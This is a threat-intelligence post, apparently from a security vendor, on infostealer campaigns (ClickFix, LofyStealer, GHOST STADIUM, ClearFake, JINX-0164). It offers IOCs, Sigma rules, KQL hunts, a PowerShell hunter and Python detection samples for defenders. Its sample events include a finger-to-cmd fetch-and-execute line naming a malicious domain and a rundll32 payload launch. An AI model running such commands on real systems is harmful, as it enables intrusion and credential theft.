
ClickFix, LofyStealer & GHOST STADIUM: Emerging Infostealer Ecosystems and C2 Innovations — OTX Pulse Analysis

Security Arsenal Team
May 30, 2026
6 min read

Threat Summary

Analysis of recent OTX pulses indicates a surge in diverse credential theft campaigns that use novel delivery mechanisms and resilient C2 infrastructure. Adversaries are moving beyond standard phishing to "ClickFix" social engineering (fake CAPTCHA verification prompts that get the victim to paste and run a command), Node.js loaders aimed at gaming communities (LofyStealer), and blockchain smart contracts as a C2 channel (ClearFake). Notably, the JINX-0164 actor is using LinkedIn to target cryptocurrency developers with macOS-specific malware, while GHOST STADIUM runs large-scale credential harvesting through FIFA World Cup 2026 ticket fraud. The common objective is financial gain, either directly (crypto, banking) or through secondary monetization by selling initial access and stolen session cookies.

Threat Actor / Malware Profile

ClickFix (CastleLoader & CastleStealer)

  • Distribution: Disguised as "BackgroundFix" image tools; uses fake "Verify you are human" browser prompts that copy a malicious command to the clipboard and instruct the victim to paste and run it.
  • Payload Behavior: Executes commands via finger.exe to retrieve CastleLoader. Drops NetSupport RAT for remote access and CastleStealer (.NET) for credential exfiltration.
  • Persistence: Uses standard RAT persistence mechanisms (Registry run keys, scheduled tasks).

LofyStealer (LofyGang)

  • Distribution: Targets Minecraft players via social engineering.
  • Payload Behavior: Two-stage attack. Initial 53.5MB Node.js loader (disguised as libraries) drops a 1.4MB memory-only C++ payload. Harvests cookies, passwords, and crypto wallets from 8+ browsers.
  • Anti-Analysis: Uses direct syscalls to evade user-mode hooks and runs the second stage entirely in memory to avoid on-disk scanning.

GHOST STADIUM

  • Distribution: Typosquatting and lookalike domains for FIFA 2026 (e.g., fifa.gold, fifa.black); propagated via Facebook ads.
  • Payload Behavior: Deploys Vidar and Lumma stealers. Clones FIFA authentication systems to harvest user credentials.
  • Infrastructure: Mass domain registration (4,300+ domains) providing redundancy against takedowns.

ClearFake (EtherHiding)

  • Distribution: Compromised websites injected with malicious JavaScript.
  • C2 Communication: Uses EtherHiding, storing payload routing instructions in a smart contract on the BNB Smart Chain testnet and reading them back through public RPC endpoints. Because the contract lives on a public blockchain there is no hosting provider or registrar to serve a takedown to, and the operator can still update the stored instructions with a new transaction, so the C2 is both hard to seize and easy to re-point.
  • Payload: Delivers SectopRAT and ACRStealer.

JINX-0164

  • Distribution: LinkedIn phishing using a recruiter persona.
  • Payload: Delivers AUDIOFIX (Python RAT/Stealer) and MINIRAT (Go Backdoor).
  • Targeting: Specific focus on cryptocurrency software developers and macOS environments.

IOC Analysis

The current dataset contains a high volume of domain indicators (110+) tied to credential harvesting (GHOST STADIUM) and C2 infrastructure (JINX-0164). File hashes are predominantly SHA256 for loaders and stealers, with several MD5/SHA1 hashes for the LofyStealer components. Several ClickFix loader URLs use a non-standard HTTP port (e.g. :688). Such traffic slips past inspection that is scoped to ports 80/443 only, but it is also an easy hunting pivot: workstations rarely make outbound connections on ports like this, and a default-deny egress policy blocks them outright.

Operational Guidance:

  • SOCs: Prioritize blocking the listed FIFA-related domains and JINX-0164 infrastructure immediately.
  • EDR: Configure behavioral alerts for finger.exe making network connections or spawning from a shell, and for node.exe spawning child processes outside of development environments.
  • Network: If ClearFake activity is suspected, monitor DNS queries and outbound HTTPS from browsers to public BNB Smart Chain testnet RPC endpoints, alongside the listed suspicious domains; most workstations have no legitimate reason to talk to a blockchain testnet.
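The EDR heuristics above, applied to sample events so the logic can be tested before it becomes a rule. This is an added example and not code from the OTX pulses or the Security Arsenal team; the events are constructed to resemble Sysmon Event ID 1 (process create) and Event ID 3 (network connect) fields and are not real telemetry. The `finger user@host | cmd` pipeline pattern is the documented finger.exe LOLBin usage and is an assumption of this example rather than something the pulses state.

```python
"""Process-creation and network-event heuristics for ClickFix and LofyStealer,
run over constructed sample events (added example, not pulse data)."""
from dataclasses import dataclass
from typing import List, Optional
import ntpath
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
CLICKFIX_PORT = 688  # non-standard port seen in the ClickFix loader URLs
# Assumed ClickFix one-liner shape: finger.exe output piped into a shell.
FINGER_PIPE = re.compile(r"finger(\.exe)?\s+\S+@\S+\s*\|\s*(cmd|powershell)", re.I)


@dataclass
class Event:
    host: str
    image: str              # full path of the created process
    parent_image: str
    command_line: str
    remote_port: Optional[int] = None   # set when the process made a connection


def _name(path: str) -> str:
    """Case-folded file name, tolerant of Windows paths on any platform."""
    return ntpath.basename(path).lower()


def classify(ev: Event) -> List[str]:
    """Return the heuristics the event trips (empty list when benign)."""
    hits: List[str] = []
    img, parent = _name(ev.image), _name(ev.parent_image)

    # ClickFix / CastleLoader: finger.exe is essentially unused in modern
    # environments, so any execution is worth a look; a shell parent or an
    # outbound connection makes it more suspicious still.
    if img == "finger.exe":
        hits.append("clickfix:finger_exec")
        if parent in SHELLS:
            hits.append("clickfix:finger_from_shell")
        if ev.remote_port is not None:
            hits.append("clickfix:finger_network")
    # The pasted one-liner itself, visible before finger.exe even starts.
    if img in SHELLS and FINGER_PIPE.search(ev.command_line):
        hits.append("clickfix:finger_pipe_cmdline")

    # LofyStealer: node.exe spawning a shell outside an npm build script.
    if parent == "node.exe" and img in SHELLS and "npm" not in ev.command_line.lower():
        hits.append("lofy:node_spawns_shell")

    # Non-standard egress port from any process.
    if ev.remote_port == CLICKFIX_PORT:
        hits.append("clickfix:port_688")
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    Event("WKS-017", r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
          'cmd /c "finger user@trindastal.com | cmd"'),
    Event("WKS-017", r"C:\Windows\System32\finger.exe", r"C:\Windows\System32\cmd.exe",
          "finger user@trindastal.com", remote_port=79),
    Event("WKS-031", r"C:\Program Files\nodejs\node.exe", r"C:\Windows\explorer.exe",
          "node index.js"),
    Event("WKS-031", r"C:\Windows\System32\cmd.exe", r"C:\Program Files\nodejs\node.exe",
          'cmd.exe /d /s /c "rundll32 payload.dll,Run"'),
    Event("DEV-004", r"C:\Windows\System32\cmd.exe", r"C:\Program Files\nodejs\node.exe",
          'cmd.exe /d /s /c "npm run build"'),
    Event("WKS-050", r"C:\Users\u\AppData\Local\Temp\BackgroundFix.exe", r"C:\Windows\explorer.exe",
          "BackgroundFix.exe", remote_port=688),
]


def triage(events=SAMPLE_EVENTS):
    """(host, process name, hits) for every event that trips at least one heuristic."""
    out = []
    for ev in events:
        hits = classify(ev)
        if hits:
            out.append((ev.host, _name(ev.image), hits))
    return out


if __name__ == "__main__":
    for host, proc, hits in triage():
        print(f"ALERT {host} {proc}: {', '.join(hits)}")
```

The DEV-004 event shows why the npm exclusion exists: node.exe spawning cmd.exe is routine on developer machines, so the rule has to key on what the shell was asked to run, not merely on the parent/child pair.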

Detection Engineering

Sigma Rules

YAML
title: ClickFix BackgroundFix Suspicious Finger.exe Execution
id: 9a8b7c6d-5e4f-3a2b-1c0d-9e8f7a6b5c4d
description: Detects execution of finger.exe, consistent with ClickFix/CastleLoader infection chains in which a clipboard-pasted command runs finger.exe to retrieve the loader. In that chain the parent is normally cmd.exe or powershell.exe, so parents under System32 must not be filtered out.
status: experimental
date: 2026/05/31
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/64271c9e2d35b133d84e8c4b/
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\finger.exe'
        - OriginalFileName: 'finger.exe'
    condition: selection
falsepositives:
    - Legacy administration tools (rare); tune by excluding named administrative hosts rather than by parent path
level: high
---
title: LofyStealer Node.js Loader Spawning Shell
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: Detects node.exe spawning cmd.exe, powershell.exe or pwsh.exe, consistent with the LofyStealer Node.js loader decrypting and launching its in-memory C++ payload. npm build scripts are excluded; expect further tuning on developer workstations.
status: experimental
date: 2026/05/31
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/64271c9e2d35b133d84e8c4c/
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1059.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\node.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
    filter_dev:
        CommandLine|contains: 'npm'  # npm run/build scripts are executed through a shell
    condition: selection and not filter_dev
falsepositives:
    - Legitimate development build processes, Node-based tooling and CI agents
level: high
---
title: GHOST STADIUM FIFA Fraud Domain Access
id: 2c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
description: Detects DNS queries for known FIFA World Cup 2026 fraudulent domains associated with the GHOST STADIUM campaign, matching the apex domains and their subdomains without also matching lookalikes that merely contain the string. Pair with proxy or firewall logs for connections that bypass the local resolver.
status: experimental
date: 2026/05/31
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/64271c9e2d35b133d84e8c4b/
tags:
    - attack.initial_access
    - attack.t1566.002
    - attack.credential_access
    - attack.t1056.003
logsource:
    category: dns_query
    product: windows
detection:
    selection_apex:
        QueryName:
            - 'fifa.gold'
            - 'fifa.black'
            - 'fifa.tax'
            - 'fifaweb.com'
            - 'fifa.red'
            - 'fifa.fund'
            - 'fifa-com.shop'
    selection_subdomain:
        QueryName|endswith:
            - '.fifa.gold'
            - '.fifa.black'
            - '.fifa.tax'
            - '.fifaweb.com'
            - '.fifa.red'
            - '.fifa.fund'
            - '.fifa-com.shop'
    condition: 1 of selection_*
falsepositives:
    - Unlikely; these are not official FIFA domains
level: critical
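The domain rule above has to treat `tickets.fifa.gold` as a hit and `notfifa.gold` as a miss, which a plain substring test gets wrong. The following is an added example, not code from the OTX pulses or the Security Arsenal team, that shows the suffix-aware matcher beside the naive one over constructed DNS query log lines (the lines mimic Sysmon Event ID 22 fields and are not real telemetry; the indicator list is the one from the rule).

```python
"""Suffix-aware IOC domain matching over DNS query log lines
(added example; the log lines are constructed, the IOCs come from the rule above)."""
import re
from typing import List, Optional, Tuple

GHOST_STADIUM_DOMAINS = {
    "fifa.gold", "fifa.black", "fifa.tax", "fifaweb.com",
    "fifa.red", "fifa.fund", "fifa-com.shop",
}


def normalize(name: str) -> str:
    """DNS names are case-insensitive and are often logged with a trailing dot."""
    return name.strip().rstrip(".").lower()


def match_ioc(query: str, iocs=GHOST_STADIUM_DOMAINS) -> Optional[str]:
    """Return the IOC when `query` is that domain or a subdomain of it, else None."""
    labels = normalize(query).split(".")
    # Walk the candidate suffixes from most to least specific; the first hit
    # is the longest IOC that is a registrable parent of the query.
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in iocs:
            return candidate
    return None


def naive_match(query: str, iocs=GHOST_STADIUM_DOMAINS) -> Optional[str]:
    """Substring test, kept only to show its false positives."""
    q = normalize(query)
    return next((d for d in sorted(iocs) if d in q), None)


# Constructed log lines in a reduced Sysmon Event ID 22 shape (not real telemetry).
LOG = """\
2026-05-30T09:14:02Z WKS-017 chrome.exe QueryName=tickets.fifa.gold.
2026-05-30T09:14:05Z WKS-017 chrome.exe QueryName=www.fifa.com
2026-05-30T09:15:11Z WKS-022 msedge.exe QueryName=FIFA-COM.SHOP
2026-05-30T09:16:40Z WKS-009 firefox.exe QueryName=notfifa.gold
2026-05-30T09:17:03Z WKS-009 firefox.exe QueryName=fifa.goldmine.example
"""
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<proc>\S+) QueryName=(?P<q>\S+)$")


def scan(log: str = LOG) -> List[Tuple[str, str, str, str]]:
    """(host, process, normalized query, matched IOC) for every line that hits."""
    hits = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these
        ioc = match_ioc(m["q"])
        if ioc:
            hits.append((m["host"], m["proc"], normalize(m["q"]), ioc))
    return hits


if __name__ == "__main__":
    for host, proc, q, ioc in scan():
        print(f"ALERT {host} {proc} queried {q} (IOC {ioc})")
    for q in ("notfifa.gold", "fifa.goldmine.example"):
        print(f"naive={naive_match(q)!r} strict={match_ioc(q)!r} for {q}")
```

The same suffix walk applies to any domain watchlist, not only this campaign; it is also the behaviour the two-selection Sigma rule above reproduces with `QueryName` plus `QueryName|endswith`.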

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix C2 infrastructure. The known domains are matched on any
// port; the non-standard port 688 from the IOCs is a separate pivot, because
// folding 80/443 into the same port clause would match nearly all traffic.
let ClickFixDomains = dynamic(["trindastal.com", "poronto.com", "brionter.com", "giovettiadv.com"]);
DeviceNetworkEvents
| where ActionType in ("ConnectionSuccess", "ConnectionAttempt")
| extend Domain = tolower(tostring(split(RemoteUrl, "/")[0]))
| where Domain has_any (ClickFixDomains) or RemotePort == 688
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemotePort, RemoteIP

// Hunt for LofyStealer components by hash. DeviceFileEvents catches the
// loader being written; DeviceProcessEvents catches it being launched, which
// matters when the drop predates the telemetry retention window.
let LofyHashes = dynamic(["293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881", "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7"]);
union DeviceFileEvents, DeviceProcessEvents
| where SHA256 in (LofyHashes)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName

PowerShell Hunt Script

PowerShell
# IOC Hunter for JINX-0164 and Ghost Stadium Infrastructure
# Checks the DNS client cache, the hosts file and established TCP connections
# for the listed domains, then scans fixed drives for the listed SHA256 hashes.
# Run from an elevated prompt: the connection table and the full-disk scan need it.

$TargetDomains = @(
    "driver-updater.net",      # JINX-0164
    "login.teamicrosoft.com",  # JINX-0164
    "live.ong",                # JINX-0164
    "teams.live.us.org",       # JINX-0164
    "fifa.gold",               # GHOST STADIUM
    "fifa.black",
    "fifa.tax",
    "fifaweb.com",
    "fifa.red",
    "fifa.fund"
)

$MaliciousHashes = @(
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92", # CastleLoader
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"  # AUDIOFIX
)

# True when $Name is a listed domain or a subdomain of one (login.fifa.gold),
# but not a lookalike that merely contains it (notfifa.gold).
function Test-TargetDomain {
    param([string]$Name)
    $n = $Name.TrimEnd('.').ToLowerInvariant()
    foreach ($d in $TargetDomains) {
        if ($n -eq $d -or $n.EndsWith(".$d")) { return $true }
    }
    return $false
}

Write-Host "[+] Checking DNS client cache for known malicious domains..." -ForegroundColor Cyan
$SuspectIPs = @{}   # resolved address -> domain, reused for the connection check below
Get-DnsClientCache -ErrorAction SilentlyContinue | Where-Object { Test-TargetDomain $_.Entry } | ForEach-Object {
    Write-Host "[!] ALERT: Cached DNS entry $($_.Entry) -> $($_.Data)" -ForegroundColor Red
    if ([System.Net.IPAddress]::TryParse($_.Data, [ref]$null)) { $SuspectIPs[$_.Data] = $_.Entry }
}

Write-Host "[+] Checking hosts file..." -ForegroundColor Cyan
$HostsPath = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'
Get-Content $HostsPath -ErrorAction SilentlyContinue | ForEach-Object {
    $line = ($_ -split '#')[0].Trim()                  # strip comments
    if (-not $line) { return }
    $fields = $line -split '\s+'
    foreach ($h in ($fields | Select-Object -Skip 1)) {
        if (Test-TargetDomain $h) {
            Write-Host "[!] ALERT: hosts file maps $h to $($fields[0])" -ForegroundColor Red
        }
    }
}

# Established connections are matched against addresses the resolver already
# returned for the target domains. Reverse DNS on a C2 address almost never
# yields the attacker's hostname, and a forward lookup from the hunt itself
# would tip off an adversary watching their authoritative resolver.
Write-Host "[+] Checking established connections..." -ForegroundColor Cyan
Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue | ForEach-Object {
    if ($SuspectIPs.ContainsKey($_.RemoteAddress)) {
        $proc = (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName
        Write-Host "[!] ALERT: $proc (PID $($_.OwningProcess)) -> $($_.RemoteAddress):$($_.RemotePort) ($($SuspectIPs[$_.RemoteAddress]))" -ForegroundColor Red
    }
}

Write-Host "[+] Scanning fixed drives for malicious file hashes (CastleLoader/AUDIOFIX)..." -ForegroundColor Cyan
Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Root -match '^[A-Za-z]:\\$' } | ForEach-Object {
    Get-ChildItem -Path $_.Root -Recurse -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -gt 0 } |
        ForEach-Object {
            # -contains is case-insensitive, so Get-FileHash's upper-case output still matches
            $hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($hash -and $MaliciousHashes -contains $hash) {
                Write-Host "[!] ALERT: Malicious file found: $($_.FullName)" -ForegroundColor Red
            }
        }
}
Write-Host "[+] Hunt complete."

Response Priorities

  • Immediate: Block all domains listed in the IOC Analysis (specifically FIFA-lookalikes and JINX-0164 typosquats) at the perimeter. Hunt for finger.exe execution across the enterprise.
  • 24h: If potential compromise is detected (e.g., presence of LofyStealer or Ghost Stadium activity), force password resets for affected users and invalidate session tokens. Investigate any macOS developer laptops for connections to live.ong or driver-updater.net.
  • 1 week: Implement application control policies that block finger.exe and restrict node.exe to approved developer workstations and paths. Conduct security awareness training on "ClickFix" browser verification prompts and LinkedIn recruiting scams targeting developers.


Tags: darkweb, otx-pulse, darkweb-credentials, infostealer, clickfix, lofystealer, credential-theft, phishing
